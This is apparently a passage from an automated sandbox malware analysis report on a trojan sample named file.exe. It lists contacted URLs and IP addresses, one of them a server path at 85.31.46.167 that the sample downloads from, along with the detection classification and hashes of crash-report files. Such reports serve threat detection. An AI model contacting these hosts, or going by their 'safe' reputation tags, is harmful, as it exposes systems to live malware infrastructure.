                                                  http://www.fontbureau.com/designers/frere-jones.htmlCleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://85.31.46.167/software.php$file.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.314526683.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://g-cleanit.hkfile.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.jiyu-kobo.co.jp/Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designerseKCleaner.exe, 00000021.00000003.402175756.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.404838301.0000024B7E1C5000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.405253003.0000024B7E1C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers8Cleaner.exe, 00000021.00000002.658703829.0000024B7F392000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/Cleaner.exe, 00000021.00000003.391036732.0000024B7E1C2000.00000004.00000020.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000003.391426565.0000024B7E1C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://85.31.46.167/software.phpCoofile.exe, 00000000.00000003.315870988.000000000085F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          148.251.234.83
                                                          		iplogger.orgGermany
                                                          		24940HETZNER-ASDEfalse
                                                          208.67.104.97
                                                          		unknownUnited States
                                                          		20042GRAYSON-COLLIN-COMMUNICATIONSUStrue
                                                          85.31.46.167
                                                          		unknownGermany
                                                          		43659CLOUDCOMPUTINGDEtrue
                                                          107.182.129.235
                                                          		unknownReserved
                                                          		11070META-ASUSfalse
                                                          171.22.30.106
                                                          		unknownGermany
                                                          		33657CMCSUSfalse

                                                          General Information

                                                          Joe Sandbox Version:36.0.0 Rainbow Opal
                                                          Analysis ID:715150
                                                          Start date and time:2022-10-03 17:30:53 +02:00
                                                          Joe Sandbox Product:CloudBasic
                                                          Overall analysis duration:0h 11m 20s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:light
                                                          Sample file name:file.exe
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                          Run name:Run with higher sleep bypass
                                                          Number of analysed new started processes analysed:44
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • HDC enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Detection:MAL
                                                          Classification:mal100.troj.winEXE@17/52@1/5
                                                          EGA Information:Failed
                                                          HDC Information:Failed
                                                          HCA Information:
                                                          • Successful, ratio: 92%
                                                          • Number of executed functions: 0
                                                          • Number of non-executed functions: 0
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .exe
                                                          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, BackgroundTransferHost.exe, WerFault.exe, RuntimeBroker.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                          • TCP Packets have been reduced to 100
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                          • Execution Graph export aborted for target Cleaner.exe, PID 5272 because it is empty
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                                          Simulations

                                                          Behavior and APIs

                                                          No simulations

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          No context

                                                          Domains

                                                          No context

                                                          ASNs

                                                          No context

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_19a29c4013ef4dd44ec0ddb13aa79330f349af61_440dec59_0f5aa088\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9615479906283381
                                                          Encrypted:false
                                                          SSDEEP:192:+VCfavsSHox3uWI3jDyrD/u7scS274ItmFBx:Cjox3uNjg/u7scX4ItU
                                                          MD5:47885273E046E9CF2253FB23800F2B4E
                                                          SHA1:F4699B6698FEA95A6E1255A4F43DC33422FBB036
                                                          SHA-256:B6C978A12DDAC96E47DC9E5D373EB09537CCE6C063EC808D99291583365E557A
                                                          SHA-512:BDC428C9C6D9630F8AD39684948603F6BDD81F106880DCA6495C34B99098DFF12F1455F19D9A61AAC4AB7668426883ACA0F4DF2234F2CC69558AA0830CF348FF
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.2.0.5.1.2.2.0.2.2.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.5.b.5.6.6.5.-.3.0.6.4.-.4.1.6.b.-.a.7.6.7.-.8.b.4.a.3.6.4.c.d.6.9.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.c.0.e.2.8.9.-.e.0.0.7.-.4.7.f.2.-.8.f.f.b.-.4.7.7.a.1.b.5.e.2.4.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_050a1b5a\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.9125206160115215
                                                          Encrypted:false
                                                          SSDEEP:192:D8VCfavDzH56rfI3jDyc/u7shS274ItmFBx:DMv56rojD/u7shX4ItU
                                                          MD5:A40D3063D78F2982A383CB5C50311B6C
                                                          SHA1:924CB5A083E7E29127B9CBC03A674E16EBC4156E
                                                          SHA-256:56EAFDA88322346DA6A302F4526E4CBB4CBEF54D5BEE2EE7CA3C140A49F05543
                                                          SHA-512:1A0C2E6C9FAE59DD9D104ED45FAB8E06059552726A1AFD53ECB83DD2C126F16DA12E142C490FF3D20DC280F2275D3080B41D9D3C0FD3CF5E75ACCDB87298C0C4
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.7.0.9.4.1.1.9.5.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.0.a.7.2.2.b.-.0.8.c.f.-.4.c.c.4.-.8.a.c.0.-.2.8.0.6.1.f.5.7.1.0.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.c.3.4.1.f.6.-.9.b.f.c.-.4.6.7.c.-.b.1.2.1.-.f.9.4.9.f.b.1.5.e.f.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_11c5ac93\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8590430290576522
                                                          Encrypted:false
                                                          SSDEEP:192:ZVCfavHzH56rfI3jDm/u7shS274ItmFBx:DT56rojC/u7shX4ItU
                                                          MD5:F3F36BBB55F6E790A86DBA1F15B9A00B
                                                          SHA1:49AC90E23C1F9D8B0F6CD11D9FC4CD0F66F44466
                                                          SHA-256:4BA7004A41F766ABFA91086987DBA184975D827A94DDCE79BBC1FB214169FFD5
                                                          SHA-512:7885223897D83B09CFEF4DD680F8E6E2565C72F422F1D04F0ADF38D7F98CEFD52E6DB14D01C6B56141F1C5DBC88D1599DDA261B7522DDD535C438557DA95B6BB
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.4.2.8.2.4.9.5.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.d.9.5.3.a.7.1.-.3.6.2.1.-.4.e.6.9.-.8.b.4.d.-.2.4.5.9.1.4.4.6.7.8.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.6.2.6.7.e.b.0.-.8.0.5.0.-.4.0.8.f.-.9.c.5.8.-.d.9.0.6.9.f.4.7.6.7.4.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_12a5b81c\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8787028216016062
                                                          Encrypted:false
                                                          SSDEEP:192:m4VCfavuzH56rfI3jDym/u7shS274ItmFBx:/E56rojJ/u7shX4ItU
                                                          MD5:F90783CAE54A721754D4F10AADB5ACBA
                                                          SHA1:ADBFD87A7D89F88513561BEA08B3371E5EF530AC
                                                          SHA-256:F257E6F28AA994BDC0B69B789D2FEE724C6089019B53624E1C74266DF8663BCA
                                                          SHA-512:4F0C4081AAA5CCD1C5985DCB1DCFE7E30AF9E19C0F8E5F2992F9B04CBB6677795ABBC91E185FBC6C218A87F510D40E3E4E3E4B04E2354AE6DACDF187F30278C1
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.4.5.9.8.7.3.6.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.c.1.7.b.5.e.-.6.3.4.8.-.4.8.2.0.-.8.8.5.7.-.2.8.4.5.5.d.8.7.f.e.9.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.0.3.0.3.4.e.2.-.6.0.3.0.-.4.8.d.9.-.a.f.9.7.-.a.b.0.f.b.1.a.9.5.5.e.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_14656e32\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8358188215804623
                                                          Encrypted:false
                                                          SSDEEP:192:CVCfavUzH56rfI3jDB/u7sGS274ItmFBx:ei56rojl/u7sGX4ItU
                                                          MD5:8A9E5C963519858FE9A11A13F26E714A
                                                          SHA1:A0221695263B3BE0CD6A3474E5F747983851E278
                                                          SHA-256:5BF7D4DF1698DD1B6A0081B38BBC8502A87DF63DCBB0A276AF213AC3E372A650
                                                          SHA-512:C384DA290D76285B1B21F5CCDAF65AA8655433ECE564F6606E0D8EED26BB6262E4F0F73A74E349A335293D764FC5EEBAC49C6AB0CFDAF93A4DCED7DE28DCB585
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.2.7.6.0.9.7.2.0.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.f.d.f.e.4.7.5.-.1.1.c.d.-.4.2.f.2.-.a.f.8.e.-.7.8.5.7.5.6.5.8.6.5.a.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.8.e.a.4.5.2.-.6.b.1.0.-.4.5.6.8.-.8.b.f.e.-.e.1.e.2.5.8.5.7.8.a.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_15d97769\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8356682104401857
                                                          Encrypted:false
                                                          SSDEEP:192:Z5VCfav6zH56rfI3jDB/u7sGS274ItmFBx:dA56rojl/u7sGX4ItU
                                                          MD5:76A796C2F3296468940F32C2F35F290B
                                                          SHA1:21307E70E4EABFE4DFAE85644A78512E7B4D1077
                                                          SHA-256:46A9C4967C63201820BCB10FE5AF42D0ABB56CF60B59F9927806189966ECB3CA
                                                          SHA-512:3FDD338CFB28F03B8AE400E9777357C7E9158001970FA062C128CC6866809760C81E6F80A4FE77278856C535242A2B03A6CFE217618BA72046F55E72590BD5A5
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.2.9.8.1.8.2.9.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.8.e.5.8.8.4.-.f.0.c.2.-.4.1.7.6.-.8.4.f.5.-.7.8.a.d.8.1.b.9.5.c.d.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.2.0.5.0.0.d.-.5.c.f.c.-.4.3.e.c.-.a.4.9.5.-.b.f.4.f.b.d.b.7.1.b.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_16118592\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8358981846766972
                                                          Encrypted:false
                                                          SSDEEP:192:hkVCfavhzH56rfI3jDB/u7sGS274ItmFBx:y156rojl/u7sGX4ItU
                                                          MD5:3DB8FE3AF6AB3B151DA2FF2464C75598
                                                          SHA1:E53BF3BB43AEEA6A1B0B36C3D4BFD0595F120EBF
                                                          SHA-256:2E590CB8B33552CEA3EFCB52E3754187B952FEF69236E7ADEF1984F47563A9D3
                                                          SHA-512:2915C2836B29082D95BA509A08AF72A38FDCDD5D41A528A998CDC35846F0E1FD80C82FF48274187B121E5C72BA9C7713F07A84A00B318A4C5FBC14EA8EF91999
                                                          Malicious:true
                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.0.9.3.1.7.1.3.2.8.5.0.8.6.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.3.e.a.1.5.f.-.8.0.4.4.-.4.0.a.3.-.9.d.3.0.-.5.0.6.5.3.5.d.9.2.2.a.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.6.8.d.d.c.f.-.9.a.4.a.-.4.a.c.d.-.8.a.7.d.-.5.4.2.f.8.9.e.d.4.b.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.0.4.-.0.0.0.1.-.0.0.1.f.-.a.0.7.e.-.1.8.b.7.8.8.d.7.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.6.5.3.d.e.e.c.5.b.c.5.a.9.c.c.9.7.3.9.f.2.5.f.4.c.2.c.d.7.5.a.0.0.0.0.f.f.f.f.!.0.0.0.0.3.a.e.b.f.e.c.7.9.8.0.d.1.d.b.1.e.d.b.e.c.c.b.b.2.9.0.4.4.e.a.6.7.7.b.e.3.0.4.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.2././.0.9././.1.9.:.1.5.:.0.2.:.4.3.!.0.!.f.i.l.e...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....S.e.r.v.i.c.e.

                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_5d9419a62ad22f2f3dad8325a855f3b6c07dd93d_440dec59_1669c460\Report.wer

                                                          Download File
                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):65536
                                                          Entropy (8bit):0.8921234333730086
                                                          Encrypted:false
                                                          SSDEEP:192:jErVCfavuzH56rfI3jDyH/u7shS274ItmFBx:jEpE56roj4/u7shX4ItU
                                                          MD5:1B5B1DD6F38DC79A13924EE31E530FFA
                                                          SHA1:578409C4389884037F095A9DEE9147DD7F21DCCF
                                                          SHA-256:28C9846E48651E67935DBA147B7B0A9954EB42E97521068E08DC9D01A1BF1BEE
                                                          SHA-512:A93809FD5389DA74249C77126D0D7FA4875C9B346D54C5BE4B9B1732496C0EAC23CCECC9620004A15EE83226DDAC06E17E6866FFDD5540E4BE9C404006079661
                                                          Malicious:true
